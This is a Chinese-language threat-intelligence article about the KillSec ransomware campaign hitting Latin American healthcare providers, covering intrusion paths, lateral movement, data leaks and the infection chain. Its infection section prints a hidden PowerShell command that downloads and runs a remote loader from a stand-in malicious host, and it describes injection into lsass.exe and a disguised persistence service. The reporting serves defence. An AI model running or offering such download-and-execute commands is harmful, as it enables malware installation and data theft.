KillSec勒索软件攻击医疗行业IT系统

KillSec勒索软件变种已迅速成为针对拉丁美洲及其他地区医疗IT基础设施的重大威胁。

KillSec的操作人员于2025年9月初首次被发现，他们利用受影响的软件供应链关系大规模部署其有效载荷。

当几家巴西医疗服务提供商报告来自云存储桶的异常网络流量时，检测到了初步的入侵指标。

不同寻常的是，该组织将基础的窃取数据方法（如开放的AWS S3存储桶）与复杂的加密程序相结合，在最大限度降低初始入侵复杂度的同时，实现了影响的最大化。

Resecurity的分析师指出，KillSec的入侵点通常涉及未打补丁的Web应用程序或配置错误的云存储，这两种情况在正经历快速数字化转型的医疗环境中都很常见。

一旦进入内部，恶意软件就会通过合法的管理协议在内部网络中传播，包括Windows远程管理（WinRM）和远程桌面协议（RDP）。

这种横向移动往往数天内都不会被发现，这让攻击者有充足的时间获取敏感的医疗记录和个人身份信息（PII）。

该组织在洋葱网络（TOR）上的数据泄露网站展示了多起备受关注的数据窃取事件，这证实了他们愿意公开羞辱受害者以胁迫其支付赎金。

在入侵成功后，KillSec的攻击者会执行多阶段加密过程，他们使用一个轻量级加载器来调用定制的AES-256加密程序。

Resecurity的研究人员通过其独特的导入哈希和对Advapi32.dll库的异常操作识别出了该加载器，这表明其是为了规避 antivirus 启发式检测。

他们将合法的系统API与自行开发的加密组件结合使用，这使得传统的基于签名的检测方法在很大程度上失效，凸显出该组织的技术成熟度正不断提高。

KillSec出现后的一周内，已影响了十多家医疗机构，窃取了超过34GB的数据——包括未经编辑的患者图像、化验结果以及与未成年人相关的记录——随后才发出勒索软件勒索要求。

这些文件的公开泄露促使监管机构根据巴西的《通用数据保护法》（LGPD）框架发布了紧急违规通知。

威胁情报报告现在警告称，如果受影响的供应商代码仍未签名且未经验证，使用受影响软件的下游诊所和实验室可能会面临二次攻击。

感染机制深入剖析

KillSec成功的一个关键因素在于其双管齐下的感染机制，该机制将 opportunistic 的云存储桶访问与嵌入在常见文档格式中的备用下载器相结合。

受害者首先会遇到一个具有欺骗性的PDF发票文件，该文件伪装成来自某知名医疗供应商的账单。

这个格式错误的PDF文件利用了处理引擎中的一个零日漏洞，触发了一条隐蔽的PowerShell单行命令的执行：-

powershell -nop -w hidden -c "IEX((New-Object Net.WebClient).DownloadString('hxxp://malicious.example.com/loader.ps1'))"

执行时，这个PowerShell存根会检索编码的有效载荷，在内存中对其进行解码，并使用反射式DLL注入将AES加密引擎直接加载到lsass.exe中。

这种内联注入绕过了基于磁盘的检测，并将取证可见性限制在易失性内存中。

然后，加载程序会枚举网络共享和计划任务，并通过一个名为WinLevelService的伪装Windows服务创建持久性。此服务配置为在SYSTEM账户下运行，确保在每次重启时都能执行。

KillSec勒索软件的操作者通过将其加载器隐藏在看似无害的文档中，并滥用云配置错误，对医疗保健目标保持着较高的成功率，这凸显了主动进行云安全态势管理和实施严格的文档清理协议的必要性。